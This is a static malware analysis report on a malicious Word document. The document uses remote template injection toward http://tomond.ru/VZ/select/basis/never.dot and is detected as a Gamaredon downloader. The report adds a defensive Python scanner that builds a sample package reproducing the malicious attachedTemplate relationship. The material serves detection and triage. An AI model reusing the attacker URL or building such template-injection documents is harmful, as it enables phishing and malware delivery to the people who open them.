Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 5c20d1f0c60a10e7…

MALICIOUS

Office (OOXML) / .DOC

Size: 36.5 KB
Created: 2020-02-25 05:41:00 UTC
Authoring application: Microsoft Office Word 15.0000
MD5: 378c0fe6610d9afbc8c9346d50589966
SHA-1: 3c5051115164c4e31cd965304f8fc8cdff4d1e88
SHA-256: 5c20d1f0c60a10e7d656c1a3198554356c4ebe5a801d356fd2150e29f182ede1
Risk Score: 122

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

ClamAV detects the file as a downloader, and the OOXML package carries an external relationship in word/_rels/settings.xml.rels whose target is a remote .dot template (http://tomond.ru/VZ/select/basis/never.dot), the remote template injection pattern. The document body, disguised as a request for public information, is a social engineering lure to get the user to open the file and, if Word prompts, to allow the template to load. None of the heuristics below fires on embedded VBA in this file itself; the OOXML_REMOTE_TEMPLATE finding means any macro code would be carried by the template fetched at open time, so the next-stage payload cannot be judged from this sample alone.

Heuristics (4)

  • ClamAV: Doc.Downloader.Gamaredon-9966166-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Gamaredon-9966166-1
  • Remote template injection high OOXML_REMOTE_TEMPLATE
    Document references a remote template URL (http://tomond.ru/VZ/select/basis/never.dot) — a common remote-template-injection vector used by Hancitor, Emotet and many phishing campaigns. Word can fetch and apply the remote template; macros in that template may execute depending on Office policy and trust state.
  • External relationship medium OOXML_EXTERNAL_REL
    External target in word/_rels/settings.xml.rels: http://tomond.ru/VZ/select/basis/never.dot
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://tomond.ru/VZ/select/basis/never.dot (channel: external attached-template relationship in word/_rels/settings.xml.rels; this is the only network indicator in the list)
    The remaining extracted URLs are OOXML XML namespace identifiers declared on the document parts. They are schema names, not network destinations; Word does not fetch them and they should not be treated as indicators:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
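The OOXML_REMOTE_TEMPLATE and OOXML_EXTERNAL_REL heuristics above come down to one static check: walk every `.rels` part in the package, keep relationships with `TargetMode="External"`, and treat an `attachedTemplate` relationship whose target is off-host as remote template injection. The Python below is an added worked example, not the analyser that produced this report. The package it builds is constructed inline to mirror the settings.xml.rels relationship reported here, not the analysed file itself; the internal `styles.xml` relationship and the `https://example.invalid/info` hyperlink are assumptions added to show what is and is not flagged.

```python
"""Triage helper: list External-mode relationships in an OOXML package and flag
remote attached templates (the OOXML_REMOTE_TEMPLATE / OOXML_EXTERNAL_REL pattern).
Added example; not part of the analyser behind the report above."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Packaging relationships namespace used by every *.rels part.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = REL_TYPE_BASE + "/attachedTemplate"
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def external_relationships(docx_bytes):
    """Return one dict per relationship with TargetMode="External" in any *.rels part.

    Elements are matched by qualified name, so the check works whatever prefix
    (or default namespace) the part happens to declare."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(pkg.read(name))
            except ET.ParseError:
                continue  # a damaged .rels part deserves its own finding; out of scope here
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                hits.append({"part": name,
                             "type": rel.get("Type", ""),
                             "target": rel.get("Target", "")})
    return hits


def is_remote(target):
    """True for URL schemes Word resolves over the network, and for UNC paths."""
    return urlparse(target).scheme.lower() in REMOTE_SCHEMES or target.startswith("\\\\")


def scan(docx_bytes):
    """Return (label, severity, part, target) tuples mirroring the report's heuristics.

    An attachedTemplate relationship pointing off-host is the remote template
    injection case; any other off-host External relationship is reported as medium."""
    findings = []
    for rel in external_relationships(docx_bytes):
        if not is_remote(rel["target"]):
            continue  # e.g. a relative path to styles.xml inside the package
        if rel["type"] == ATTACHED_TEMPLATE:
            findings.append(("OOXML_REMOTE_TEMPLATE", "high", rel["part"], rel["target"]))
        else:
            findings.append(("OOXML_EXTERNAL_REL", "medium", rel["part"], rel["target"]))
    return findings


def build_sample_docx():
    """Constructed sample, not the analysed file: the minimum parts that show the pattern."""
    settings_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}"
      Target="http://tomond.ru/VZ/select/basis/never.dot" TargetMode="External"/>
</Relationships>"""
    # Internal styles relationship (must not fire) and an assumed external hyperlink (medium).
    document_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{REL_TYPE_BASE}/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{REL_TYPE_BASE}/hyperlink"
      Target="https://example.invalid/info" TargetMode="External"/>
</Relationships>"""
    # settings.xml is what makes Word act on rId1 as the attached template.
    settings = ('<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("word/settings.xml", settings)
        pkg.writestr("word/_rels/settings.xml.rels", settings_rels)
        pkg.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, severity, part, target in scan(build_sample_docx()):
        print(f"{label:<22} {severity:<7} {part}: {target}")
```

The scan never dereferences a target, so it is safe to run on a live sample; it only reads relationship parts, which is also why the `xmlns` schema URIs listed above never appear in its output (they are namespace declarations, not relationships). A fuller triage would additionally confirm that `word/settings.xml` carries a `w:attachedTemplate` whose `r:id` matches the flagged relationship, since that cross-reference is what makes Word load the template on open.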